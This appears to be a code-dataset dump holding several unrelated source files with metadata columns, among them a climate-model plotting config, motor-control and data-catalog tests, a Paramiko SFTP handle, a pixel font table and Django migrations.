'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_benchmark_file': {'lasso_benchmark': WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2018-10-02/wrf_lasso_stats_2018-10-02.nc"}, 'sam_benchmark_file': None, 'coamps_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'clubb_file': None, 'wrf_file': {'zm': clubb_output_root + '/lasso_2018-10-02_zm_wrf.nc', 'zt': clubb_output_root + '/lasso_2018-10-02_zt_wrf.nc', 'sfc': clubb_output_root + '/lasso_2018-10-02_sfc_wrf.nc', 'subcolumns': clubb_output_root + '/lasso_2018-10-02_nl_lh_sample_points_2D.nc'}, 'var_groups': [VariableGroupBase, 
VariableGroupWs]} # DO NOT EDIT THIS LIST UNLESS YOU ARE ADDING A NEW CASE. NEVER REMOVE CASES FROM THIS LIST. # You may define a subset of cases at the end of this file. ALL_CASES = [ARM, ARM_97, ASTEX_A209, ATEX, BOMEX, CGILS_S6, CGILS_S11, CGILS_S12, CLEX9_NOV02, CLEX9_OCT14, DYCOMS2_RF01, DYCOMS2_RF01_FIXED_SST, DYCOMS2_RF02_DO, DYCOMS2_RF02_DS, DYCOMS2_RF02_DS_RESTART, DYCOMS2_RF02_ND, DYCOMS2_RF02_SO, FIRE, GABLS2, GABLS2_NIGHTLY, GABLS3, GABLS3_NIGHT, GATE_SHEAR_RLSF, # IOP, JUN25_ALTOCU, LBA, MC3E, MPACE_A, MPACE_B, MPACE_B_SILHS, NEUTRAL, NOV11_ALTOCU, RICO, RICO_SILHS, TWP_ICE, WANGARA, LASSO_20170627, LASSO_20170717, LASSO_20170728, LASSO_20170923, LASSO_20180911, LASSO_20180917, LASSO_20180918, LASSO_20181002 ] CASES_TO_PLOT = ALL_CASES # If uncommented, this line will override the real CASES_TO_PLOT given above, forcing pyplotgen to only plot some cases. # CASES_TO_PLOT = [ARM] # CASES_TO_PLOT = CASES_TO_PLOT[:3]
55.181109
135
0.56254
6,984
63,679
4.701604
0.074599
0.098368
0.078694
0.06566
0.776495
0.753624
0.713485
0.650201
0.605981
0.574705
0
0.05372
0.317122
63,679
1,153
136
55.228968
0.701391
0.061527
0
0.541152
0
0.001029
0.376039
0.146891
0
0
0
0
0
1
0
false
0
0.012346
0
0.012346
0.001029
0
0
0
null
0
0
0
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
595f827df47c5f2bdd1ecfb6bc095d61ca198a03
538
py
Python
dynaban/tests/postion.py
laukik-hase/imitation_of_human_arm_on_robotic_manipulator
995beb1ab41597ca6cbecd0baecdef1ef13450f9
[ "MIT" ]
3
2021-11-13T16:54:31.000Z
2021-11-13T20:50:18.000Z
dynaban/tests/postion.py
laukik-hase/human_arm_imitation
995beb1ab41597ca6cbecd0baecdef1ef13450f9
[ "MIT" ]
null
null
null
dynaban/tests/postion.py
laukik-hase/human_arm_imitation
995beb1ab41597ca6cbecd0baecdef1ef13450f9
[ "MIT" ]
null
null
null
#!/usr/bin/env python import arm_control_utils DURATION = 30000 TRAJ_POLY1 = [1000, 100, 100] TORQUE_POLY1 = [1000, 100, 100] MODE = 3 arm_control_utils.initialize_motors() arm_control_utils.enable_state_torque() arm_control_utils.set_debug(1, 0) print("Ready to move") arm_control_utils.set_position_trajectory(1, DURATION, TRAJ_POLY1, TORQUE_POLY1) arm_control_utils.set_mode(1, MODE) arm_control_utils.disable_state_torque() arm_control_utils.stop_motors()
28.315789
80
0.702602
74
538
4.702703
0.445946
0.229885
0.344828
0.155172
0.149425
0
0
0
0
0
0
0.08
0.210037
538
19
81
28.315789
0.738824
0.037175
0
0
0
0
0.025097
0
0
0
0
0
0
1
0
false
0
0.076923
0
0.076923
0.076923
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
595fa12df823f48a76595c65b488cfd3266708e8
5,758
py
Python
google-datacatalog-connectors-commons/tests/google/datacatalog_connectors/commons/prepare/base_entry_factory_test.py
mesmacosta/datacatalog-connectors
74a4b6272cb00f2831b669d1a41133913f3df3fa
[ "Apache-2.0" ]
53
2020-04-27T21:50:47.000Z
2022-02-18T22:08:49.000Z
google-datacatalog-connectors-commons/tests/google/datacatalog_connectors/commons/prepare/base_entry_factory_test.py
mesmacosta/datacatalog-connectors
74a4b6272cb00f2831b669d1a41133913f3df3fa
[ "Apache-2.0" ]
20
2020-05-26T13:51:45.000Z
2022-01-25T00:06:19.000Z
google-datacatalog-connectors-commons/tests/google/datacatalog_connectors/commons/prepare/base_entry_factory_test.py
mesmacosta/datacatalog-connectors
74a4b6272cb00f2831b669d1a41133913f3df3fa
[ "Apache-2.0" ]
12
2020-04-30T22:14:02.000Z
2021-10-09T03:44:39.000Z
#!/usr/bin/python # coding=utf-8 # # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest import mock from google.datacatalog_connectors.commons import prepare class BaseEntryFactoryTestCase(unittest.TestCase): __COMMONS_PACKAGE = 'google.datacatalog_connectors.commons' __PREPARE_PACKAGE = '{}.prepare'.format(__COMMONS_PACKAGE) def test_format_id_should_normalize_non_compliant_id(self): formatted_id = prepare.BaseEntryFactory._format_id(u'ã123 - b456 ') self.assertEqual('a123_b456', formatted_id) def test_format_id_with_hashing_should_normalize_non_compliant_id(self): long_str = 'organization_warehouse7192ecb2__personsc3a8d512_' \ 'business_area_and_segment_of_marketing' expected_str = 'organization_warehouse7192ecb2_personsc3a8d512_' \ 'business_7074c286' formatted_id = prepare.BaseEntryFactory._format_id_with_hashing( long_str, hash_length=8) self.assertEqual(expected_str, formatted_id) def test_format_id_with_provided_pattern_should_normalize_non_compliant_id( # noqa: E501 self): long_str = 'organization__warehouse7192ecb2__personsc3a8d512_' \ 'business_area_and_segment_of_marketing' expected_str = 'organization__warehouse7192ecb2_' \ '_personsc3a8d512_businesa4f7e655' formatted_id = prepare.BaseEntryFactory._format_id_with_hashing( long_str, regex_pattern=r'[^a-zA-Z0-9_]+') self.assertEqual(expected_str, formatted_id) def test_format_display_name_should_normalize_non_compliant_name(self): formatted_name = 
prepare.BaseEntryFactory._format_display_name( u'ã123 :?: b456 ') self.assertEqual('a123 _ b456', formatted_name) @mock.patch( '{}.DataCatalogStringsHelper.truncate_string'.format(__PREPARE_PACKAGE) ) def test_format_linked_resource_should_not_normalize_compliant_string( self, mock_truncate_string): # Return same value received. mock_truncate_string.side_effect = (lambda *args: args[0]) formatted_linked_resource = prepare.BaseEntryFactory.\ _format_linked_resource( 'hdfs://namenode:8020/user/hive/warehouse/table_company' '_names_from_department_that_keeps_records_with_' 'historical_data_from_every_single_member') self.assertEqual( 'hdfs://namenode:8020/user/hive/warehouse/' 'table_company_names_from_department_that_' 'keeps_records_with_historical_data_' 'from_every_single_member', formatted_linked_resource) @mock.patch( '{}.DataCatalogStringsHelper.truncate_string'.format(__PREPARE_PACKAGE) ) def test_format_linked_resource_should_normalize_non_compliant_string( self, mock_truncate_string): # Return same value received. mock_truncate_string.side_effect = (lambda *args: args[0]) formatted_linked_resource = prepare.BaseEntryFactory. \ _format_linked_resource( 'hdfs://[namenode]:8020/user/{hive}/[warehouse]/table_company' '_names_from_?department?_that_;keeps;_records_with_' 'historical_data_from_every_single_member') self.assertEqual( 'hdfs://_namenode_:8020/user/' '_hive_/_warehouse_/table_company_names_from' '__department__that__keeps__records_with_' 'historical_data_from_every_single_member', formatted_linked_resource) @mock.patch( '{}.DataCatalogStringsHelper.truncate_string'.format(__PREPARE_PACKAGE) ) def test_format_linked_resource_should_not_normalize_non_compliant_string( self, mock_truncate_string): # Return same value received. mock_truncate_string.side_effect = (lambda *args: args[0]) formatted_linked_resource = prepare.BaseEntryFactory. 
\ _format_linked_resource( 'hdfs://[namenode]:8020/user/{hive}/[warehouse]/table_company' '_names_from_?department?_that_;keeps;_records_with_' 'historical_data_from_every_single_member', False) self.assertEqual( 'hdfs://[namenode]:8020/user/{hive}/[warehouse]/table_company' '_names_from_?department?_that_;keeps;_records_with_' 'historical_data_from_every_single_member', formatted_linked_resource) @mock.patch( '{}.DataCatalogStringsHelper.truncate_string'.format(__PREPARE_PACKAGE) ) def test_format_linked_resource_should_truncate_non_compliant_string( self, mock_truncate_string): expected_value = 'truncated_str...' mock_truncate_string.return_value = expected_value formatted_linked_resource = prepare.BaseEntryFactory. \ _format_linked_resource( 'hdfs://[namenode]:8020/user/{hive}/[warehouse]/table_company' '_names_from_?department?_that_;keeps;_records_with_' 'historical_data_from_every_single_member') self.assertEqual(expected_value, formatted_linked_resource)
42.029197
93
0.70719
620
5,758
6.058065
0.253226
0.059638
0.027689
0.037274
0.750532
0.727636
0.699947
0.682109
0.660277
0.633653
0
0.026955
0.213963
5,758
136
94
42.338235
0.802916
0.116881
0
0.51087
0
0
0.322804
0.302073
0
0
0
0
0.086957
1
0.086957
false
0
0.032609
0
0.152174
0
0
0
0
null
0
0
0
0
1
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
5962222919ba8cf295722ccc3d990ff5fdab4dcc
1,704
py
Python
ota_xml_api/util/xml_base.py
mihira/opentravel-xml-api
24d1ea4d24cf2575de474becaa665f6fc0d1971d
[ "MIT" ]
3
2016-01-14T01:12:06.000Z
2021-04-16T04:00:47.000Z
ota_xml_api/util/xml_base.py
mihira/opentravel-xml-api
24d1ea4d24cf2575de474becaa665f6fc0d1971d
[ "MIT" ]
null
null
null
ota_xml_api/util/xml_base.py
mihira/opentravel-xml-api
24d1ea4d24cf2575de474becaa665f6fc0d1971d
[ "MIT" ]
2
2017-09-04T13:02:09.000Z
2018-06-09T11:10:03.000Z
#!/usr/bin/env python """ This module contains the base xml Node and Period classes """ from xml.dom.minidom import getDOMImplementation from date import Period from constants import START, END class XmlNode(object): """ the name of the class will define the name of the node by default. classes inheriting this class will have their name set. """ _impl = getDOMImplementation() def __init__(self, name=None, **attributes): if not name: name = self.__class__.__name__ self._doc = XmlNode._impl.createDocument(None, name, None) self.element = self._doc.documentElement for key, value in attributes.items(): self.set_attribute(key, value) self.parent = None def set_attribute(self, key, value): self.element.setAttribute(key, str(value)) def set_parent(self, parent_node): self.parent = parent_node def add_child(self, child_node): child_node.set_parent(self) self.element.appendChild(child_node.element) return child_node def add_text(self, data): text = self._doc.createTextNode(data) self.element.appendChild(text) return text def __repr__(self): return self.element.toxml() class PeriodNode(XmlNode): def __init__(self, *args, **kwargs): XmlNode.__init__(self, *args, **kwargs) self._period = None self.set_period(Period()) def get_period(self): return self._period def set_period(self, period): self.set_attribute(START, period.start) self.set_attribute(END, period.end) self._period = period period = property(get_period, set_period)
27.483871
70
0.661385
215
1,704
5.004651
0.330233
0.051115
0.04461
0.022305
0
0
0
0
0
0
0
0
0.242958
1,704
61
71
27.934426
0.834109
0.117958
0
0
0
0
0
0
0
0
0
0
0
1
0.230769
false
0
0.076923
0.051282
0.512821
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
5986324fbdcbaeae05e084715dcadf5d8b4991a3
1,199
py
Python
app/stages/management/commands/import_stages_from_csv.py
guilloulouis/stage_medecine
7ec9067402e510d812a375bbfe46f2ab545587f9
[ "MIT" ]
null
null
null
app/stages/management/commands/import_stages_from_csv.py
guilloulouis/stage_medecine
7ec9067402e510d812a375bbfe46f2ab545587f9
[ "MIT" ]
null
null
null
app/stages/management/commands/import_stages_from_csv.py
guilloulouis/stage_medecine
7ec9067402e510d812a375bbfe46f2ab545587f9
[ "MIT" ]
1
2021-04-30T16:38:19.000Z
2021-04-30T16:38:19.000Z
# from django.core.management import BaseCommand # import pandas as pd # # from stages.models import Category, Stage # # # class Command(BaseCommand): # help = 'Import a list of stage in the database' # # def add_arguments(self, parser): # super(Command, self).add_arguments(parser) # parser.add_argument( # '--csv', dest='csv', default=None, # help='Specify the csv file to parse', # ) # # def handle(self, *args, **options): # csv = options.get('csv') # csv_reader = pd.read_csv(csv) # stages_to_create = [] # for index, item in csv_reader.iterrows(): # stage_raw = item['Stage'] # split = stage_raw.split('(') # stage_name = split[0].strip() # if len(split) > 1: # category_name = split[1].replace(')', '').strip() # category_object, created = Category.objects.get_or_create(name=category_name) # else: # category_object = None # stages_to_create.append(Stage(name=stage_name, place_max=item['places'], category=category_object)) # Stage.objects.bulk_create(stages_to_create)
37.46875
113
0.584654
139
1,199
4.863309
0.482014
0.035503
0.06213
0
0
0
0
0
0
0
0
0.003488
0.282736
1,199
31
114
38.677419
0.782558
0.947456
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
2
59a09df4f04358386749f3598f84da0352793936
189
py
Python
venv/Lib/site-packages/shiboken2/_config.py
gabistoian/Hide-Text-in-image
88b5ef0bd2bcb0e222cfbc7abf6ac2b869f72ec5
[ "X11" ]
null
null
null
venv/Lib/site-packages/shiboken2/_config.py
gabistoian/Hide-Text-in-image
88b5ef0bd2bcb0e222cfbc7abf6ac2b869f72ec5
[ "X11" ]
null
null
null
venv/Lib/site-packages/shiboken2/_config.py
gabistoian/Hide-Text-in-image
88b5ef0bd2bcb0e222cfbc7abf6ac2b869f72ec5
[ "X11" ]
null
null
null
shiboken_library_soversion = str(5.15) version = "5.15.2.1" version_info = (5, 15, 2.1, "", "") __build_date__ = '2022-01-07T13:13:47+00:00' __setup_py_package_version__ = '5.15.2.1'
15.75
44
0.671958
34
189
3.294118
0.617647
0.107143
0.107143
0.133929
0.214286
0
0
0
0
0
0
0.219512
0.132275
189
11
45
17.181818
0.463415
0
0
0
0
0
0.216931
0.132275
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
59ac4ecc150b88338555999e74b36af7366e76c2
271
py
Python
method/boardInfo.py
gary920209/LightDance-RPi
41d3ef536f3874fd5dbe092f5c9be42f7204427d
[ "MIT" ]
2
2020-11-14T17:13:55.000Z
2020-11-14T17:42:39.000Z
method/boardInfo.py
gary920209/LightDance-RPi
41d3ef536f3874fd5dbe092f5c9be42f7204427d
[ "MIT" ]
null
null
null
method/boardInfo.py
gary920209/LightDance-RPi
41d3ef536f3874fd5dbe092f5c9be42f7204427d
[ "MIT" ]
null
null
null
import os from .baseMethod import BaseMethod # BoardInfo class BoardInfo(BaseMethod): def method(self, payload): info = [ "boardInfo", {"name": os.name, "type": "dancer", "OK": True, "msg": "Success"}, ] return info
19.357143
78
0.553506
27
271
5.555556
0.703704
0
0
0
0
0
0
0
0
0
0
0
0.306273
271
13
79
20.846154
0.797872
0.03321
0
0
0
0
0.134615
0
0
0
0
0
0
1
0.111111
false
0
0.222222
0
0.555556
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
2
59afd173c9893de34534a54b0f3445d6fe88b945
7,189
py
Python
fonts/Org_01.py
cnobile2012/Python-TFT
812a87e6f694eae338c3d9579ea98eae636f8f99
[ "MIT" ]
null
null
null
fonts/Org_01.py
cnobile2012/Python-TFT
812a87e6f694eae338c3d9579ea98eae636f8f99
[ "MIT" ]
null
null
null
fonts/Org_01.py
cnobile2012/Python-TFT
812a87e6f694eae338c3d9579ea98eae636f8f99
[ "MIT" ]
null
null
null
# Org_v01 by Orgdot (www.orgdot.com/aliasfonts). A tiny, # stylized font with all characters within a 6 pixel height. Org_01Bitmaps = [ 0xE8, 0xA0, 0x57, 0xD5, 0xF5, 0x00, 0xFD, 0x3E, 0x5F, 0x80, 0x88, 0x88, 0x88, 0x80, 0xF4, 0xBF, 0x2E, 0x80, 0x80, 0x6A, 0x40, 0x95, 0x80, 0xAA, 0x80, 0x5D, 0x00, 0xC0, 0xF0, 0x80, 0x08, 0x88, 0x88, 0x00, 0xFC, 0x63, 0x1F, 0x80, 0xF8, 0xF8, 0x7F, 0x0F, 0x80, 0xF8, 0x7E, 0x1F, 0x80, 0x8C, 0x7E, 0x10, 0x80, 0xFC, 0x3E, 0x1F, 0x80, 0xFC, 0x3F, 0x1F, 0x80, 0xF8, 0x42, 0x10, 0x80, 0xFC, 0x7F, 0x1F, 0x80, 0xFC, 0x7E, 0x1F, 0x80, 0x90, 0xB0, 0x2A, 0x22, 0xF0, 0xF0, 0x88, 0xA8, 0xF8, 0x4E, 0x02, 0x00, 0xFD, 0x6F, 0x0F, 0x80, 0xFC, 0x7F, 0x18, 0x80, 0xF4, 0x7D, 0x1F, 0x00, 0xFC, 0x21, 0x0F, 0x80, 0xF4, 0x63, 0x1F, 0x00, 0xFC, 0x3F, 0x0F, 0x80, 0xFC, 0x3F, 0x08, 0x00, 0xFC, 0x2F, 0x1F, 0x80, 0x8C, 0x7F, 0x18, 0x80, 0xF9, 0x08, 0x4F, 0x80, 0x78, 0x85, 0x2F, 0x80, 0x8D, 0xB1, 0x68, 0x80, 0x84, 0x21, 0x0F, 0x80, 0xFD, 0x6B, 0x5A, 0x80, 0xFC, 0x63, 0x18, 0x80, 0xFC, 0x63, 0x1F, 0x80, 0xFC, 0x7F, 0x08, 0x00, 0xFC, 0x63, 0x3F, 0x80, 0xFC, 0x7F, 0x29, 0x00, 0xFC, 0x3E, 0x1F, 0x80, 0xF9, 0x08, 0x42, 0x00, 0x8C, 0x63, 0x1F, 0x80, 0x8C, 0x62, 0xA2, 0x00, 0xAD, 0x6B, 0x5F, 0x80, 0x8A, 0x88, 0xA8, 0x80, 0x8C, 0x54, 0x42, 0x00, 0xF8, 0x7F, 0x0F, 0x80, 0xEA, 0xC0, 0x82, 0x08, 0x20, 0x80, 0xD5, 0xC0, 0x54, 0xF8, 0x80, 0xF1, 0xFF, 0x8F, 0x99, 0xF0, 0xF8, 0x8F, 0x1F, 0x99, 0xF0, 0xFF, 0x8F, 0x6B, 0xA4, 0xF9, 0x9F, 0x10, 0x8F, 0x99, 0x90, 0xF0, 0x55, 0xC0, 0x8A, 0xF9, 0x90, 0xF8, 0xFD, 0x63, 0x10, 0xF9, 0x99, 0xF9, 0x9F, 0xF9, 0x9F, 0x80, 0xF9, 0x9F, 0x20, 0xF8, 0x88, 0x47, 0x1F, 0x27, 0xC8, 0x42, 0x00, 0x99, 0x9F, 0x99, 0x97, 0x8C, 0x6B, 0xF0, 0x96, 0x69, 0x99, 0x9F, 0x10, 0x2E, 0x8F, 0x2B, 0x22, 0xF8, 0x89, 0xA8, 0x0F, 0xE0 ] Org_01Glyphs = [ [ 0, 0, 0, 6, 0, 1 ], # 0x20 ' ' [ 0, 1, 5, 2, 0, -4 ], # 0x21 '!' 
[ 1, 3, 1, 4, 0, -4 ], # 0x22 '"' [ 2, 5, 5, 6, 0, -4 ], # 0x23 '#' [ 6, 5, 5, 6, 0, -4 ], # 0x24 '$' [ 10, 5, 5, 6, 0, -4 ], # 0x25 '%' [ 14, 5, 5, 6, 0, -4 ], # 0x26 '&' [ 18, 1, 1, 2, 0, -4 ], # 0x27 ''' [ 19, 2, 5, 3, 0, -4 ], # 0x28 '(' [ 21, 2, 5, 3, 0, -4 ], # 0x29 ')' [ 23, 3, 3, 4, 0, -3 ], # 0x2A '#' [ 25, 3, 3, 4, 0, -3 ], # 0x2B '+' [ 27, 1, 2, 2, 0, 0 ], # 0x2C ',' [ 28, 4, 1, 5, 0, -2 ], # 0x2D '-' [ 29, 1, 1, 2, 0, 0 ], # 0x2E '.' [ 30, 5, 5, 6, 0, -4 ], # 0x2F '/' [ 34, 5, 5, 6, 0, -4 ], # 0x30 '0' [ 38, 1, 5, 2, 0, -4 ], # 0x31 '1' [ 39, 5, 5, 6, 0, -4 ], # 0x32 '2' [ 43, 5, 5, 6, 0, -4 ], # 0x33 '3' [ 47, 5, 5, 6, 0, -4 ], # 0x34 '4' [ 51, 5, 5, 6, 0, -4 ], # 0x35 '5' [ 55, 5, 5, 6, 0, -4 ], # 0x36 '6' [ 59, 5, 5, 6, 0, -4 ], # 0x37 '7' [ 63, 5, 5, 6, 0, -4 ], # 0x38 '8' [ 67, 5, 5, 6, 0, -4 ], # 0x39 '9' [ 71, 1, 4, 2, 0, -3 ], # 0x3A ':' [ 72, 1, 4, 2, 0, -3 ], # 0x3B '' [ 73, 3, 5, 4, 0, -4 ], # 0x3C '<' [ 75, 4, 3, 5, 0, -3 ], # 0x3D '=' [ 77, 3, 5, 4, 0, -4 ], # 0x3E '>' [ 79, 5, 5, 6, 0, -4 ], # 0x3F '?' 
[ 83, 5, 5, 6, 0, -4 ], # 0x40 '@' [ 87, 5, 5, 6, 0, -4 ], # 0x41 'A' [ 91, 5, 5, 6, 0, -4 ], # 0x42 'B' [ 95, 5, 5, 6, 0, -4 ], # 0x43 'C' [ 99, 5, 5, 6, 0, -4 ], # 0x44 'D' [ 103, 5, 5, 6, 0, -4 ], # 0x45 'E' [ 107, 5, 5, 6, 0, -4 ], # 0x46 'F' [ 111, 5, 5, 6, 0, -4 ], # 0x47 'G' [ 115, 5, 5, 6, 0, -4 ], # 0x48 'H' [ 119, 5, 5, 6, 0, -4 ], # 0x49 'I' [ 123, 5, 5, 6, 0, -4 ], # 0x4A 'J' [ 127, 5, 5, 6, 0, -4 ], # 0x4B 'K' [ 131, 5, 5, 6, 0, -4 ], # 0x4C 'L' [ 135, 5, 5, 6, 0, -4 ], # 0x4D 'M' [ 139, 5, 5, 6, 0, -4 ], # 0x4E 'N' [ 143, 5, 5, 6, 0, -4 ], # 0x4F 'O' [ 147, 5, 5, 6, 0, -4 ], # 0x50 'P' [ 151, 5, 5, 6, 0, -4 ], # 0x51 'Q' [ 155, 5, 5, 6, 0, -4 ], # 0x52 'R' [ 159, 5, 5, 6, 0, -4 ], # 0x53 'S' [ 163, 5, 5, 6, 0, -4 ], # 0x54 'T' [ 167, 5, 5, 6, 0, -4 ], # 0x55 'U' [ 171, 5, 5, 6, 0, -4 ], # 0x56 'V' [ 175, 5, 5, 6, 0, -4 ], # 0x57 'W' [ 179, 5, 5, 6, 0, -4 ], # 0x58 'X' [ 183, 5, 5, 6, 0, -4 ], # 0x59 'Y' [ 187, 5, 5, 6, 0, -4 ], # 0x5A 'Z' [ 191, 2, 5, 3, 0, -4 ], # 0x5B '[' [ 193, 5, 5, 6, 0, -4 ], # 0x5C '\' [ 197, 2, 5, 3, 0, -4 ], # 0x5D ']' [ 199, 3, 2, 4, 0, -4 ], # 0x5E '^' [ 200, 5, 1, 6, 0, 1 ], # 0x5F '_' [ 201, 1, 1, 2, 0, -4 ], # 0x60 '`' [ 202, 4, 4, 5, 0, -3 ], # 0x61 'a' [ 204, 4, 5, 5, 0, -4 ], # 0x62 'b' [ 207, 4, 4, 5, 0, -3 ], # 0x63 'c' [ 209, 4, 5, 5, 0, -4 ], # 0x64 'd' [ 212, 4, 4, 5, 0, -3 ], # 0x65 'e' [ 214, 3, 5, 4, 0, -4 ], # 0x66 'f' [ 216, 4, 5, 5, 0, -3 ], # 0x67 'g' [ 219, 4, 5, 5, 0, -4 ], # 0x68 'h' [ 222, 1, 4, 2, 0, -3 ], # 0x69 'i' [ 223, 2, 5, 3, 0, -3 ], # 0x6A 'j' [ 225, 4, 5, 5, 0, -4 ], # 0x6B 'k' [ 228, 1, 5, 2, 0, -4 ], # 0x6C 'l' [ 229, 5, 4, 6, 0, -3 ], # 0x6D 'm' [ 232, 4, 4, 5, 0, -3 ], # 0x6E 'n' [ 234, 4, 4, 5, 0, -3 ], # 0x6F 'o' [ 236, 4, 5, 5, 0, -3 ], # 0x70 'p' [ 239, 4, 5, 5, 0, -3 ], # 0x71 'q' [ 242, 4, 4, 5, 0, -3 ], # 0x72 'r' [ 244, 4, 4, 5, 0, -3 ], # 0x73 's' [ 246, 5, 5, 6, 0, -4 ], # 0x74 't' [ 250, 4, 4, 5, 0, -3 ], # 0x75 'u' [ 252, 4, 4, 5, 0, -3 ], # 0x76 'v' [ 254, 5, 4, 6, 0, -3 ], 
# 0x77 'w' [ 257, 4, 4, 5, 0, -3 ], # 0x78 'x' [ 259, 4, 5, 5, 0, -3 ], # 0x79 'y' [ 262, 4, 4, 5, 0, -3 ], # 0x7A 'z' [ 264, 3, 5, 4, 0, -4 ], # 0x7B '[' [ 266, 1, 5, 2, 0, -4 ], # 0x7C '|' [ 267, 3, 5, 4, 0, -4 ], # 0x7D ']' [ 269, 5, 3, 6, 0, -3 ] ] # 0x7E '~' Org_01 = [ Org_01Bitmaps, Org_01Glyphs, 0x20, 0x7E, 7 ] # Approx. 943 bytes
54.462121
75
0.335791
1,034
7,189
2.327853
0.281431
0.054009
0.05484
0.07312
0.176568
0
0
0
0
0
0
0.422303
0.461121
7,189
131
76
54.877863
0.199019
0.136876
0
0
0
0
0
0
0
0
0.178899
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
59c07712f78b8701ce24892262492a52ef344906
278
py
Python
src/sftp/sftp_handle.py
IntercraftMC/intercraft-sftp
6b8a4e0f94fa5708a10b0239059c7e61d39e4b0f
[ "MIT" ]
null
null
null
src/sftp/sftp_handle.py
IntercraftMC/intercraft-sftp
6b8a4e0f94fa5708a10b0239059c7e61d39e4b0f
[ "MIT" ]
2
2019-03-05T14:07:36.000Z
2019-03-08T02:00:37.000Z
src/sftp/sftp_handle.py
IntercraftMC/intercraft-sftp
6b8a4e0f94fa5708a10b0239059c7e61d39e4b0f
[ "MIT" ]
null
null
null
import os import paramiko class SftpHandle(paramiko.SFTPHandle): def stat(self): try: return paramiko.SFTPAttributes.from_stat(os.fstat(self.readfile.fileno())) except OSError as e: return paramiko.SFTPServer.convert_errno(e.errno) def chattr(self, attr): pass
19.857143
77
0.758993
38
278
5.5
0.657895
0.133971
0
0
0
0
0
0
0
0
0
0
0.136691
278
13
78
21.384615
0.870833
0
0
0
0
0
0
0
0
0
0
0
0
1
0.2
false
0.1
0.2
0
0.7
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
2
59cb4b5a7e4e4de46f30f0ecb9a11b2447b40fad
884
py
Python
web/core/migrations/0089_auto_20201118_1234.py
MTES-MCT/biocarburants
ff084916e18cdbdc41400f36fa6cc76a5e05900e
[ "MIT" ]
4
2020-03-22T18:13:12.000Z
2021-01-25T10:33:31.000Z
web/core/migrations/0089_auto_20201118_1234.py
MTES-MCT/carbure
2876756b760ab4866fa783bb40e61a046eebb1ab
[ "MIT" ]
20
2020-07-06T14:33:14.000Z
2022-03-15T16:54:17.000Z
web/core/migrations/0089_auto_20201118_1234.py
MTES-MCT/biocarburants
ff084916e18cdbdc41400f36fa6cc76a5e05900e
[ "MIT" ]
4
2020-04-03T12:19:12.000Z
2021-06-15T12:20:57.000Z
# Generated by Django 3.0.7 on 2020-11-18 11:34 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('core', '0088_matierepremiere_is_huile_vegetale'), ] operations = [ migrations.AddField( model_name='depot', name='address', field=models.CharField(default='', max_length=128), preserve_default=False, ), migrations.AddField( model_name='depot', name='ownership_type', field=models.CharField(choices=[('OWN', 'Propre'), ('THIRD_PARTY', 'Tiers')], default='THIRD_PARTY', max_length=32), ), migrations.AddField( model_name='depot', name='postal_code', field=models.CharField(default='', max_length=32), preserve_default=False, ), ]
28.516129
128
0.578054
88
884
5.625
0.568182
0.109091
0.139394
0.163636
0.363636
0.363636
0
0
0
0
0
0.041534
0.291855
884
30
129
29.466667
0.749201
0.050905
0
0.458333
1
0
0.149343
0.0454
0
0
0
0
0
1
0
false
0
0.041667
0
0.166667
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
ab72dffbafe60c111d8d185e2a4e9e3c45bff202
3,763
py
Python
utils/clustergen.py
lanhin/TripletRun
06f73a6911fae2f9874bed8f9d68bf0d3fd5e973
[ "MIT" ]
15
2019-03-22T16:07:53.000Z
2021-07-31T03:22:34.000Z
utils/clustergen.py
lanhin/TripletRun
06f73a6911fae2f9874bed8f9d68bf0d3fd5e973
[ "MIT" ]
null
null
null
utils/clustergen.py
lanhin/TripletRun
06f73a6911fae2f9874bed8f9d68bf0d3fd5e973
[ "MIT" ]
2
2018-05-23T08:30:39.000Z
2020-08-28T11:13:40.000Z
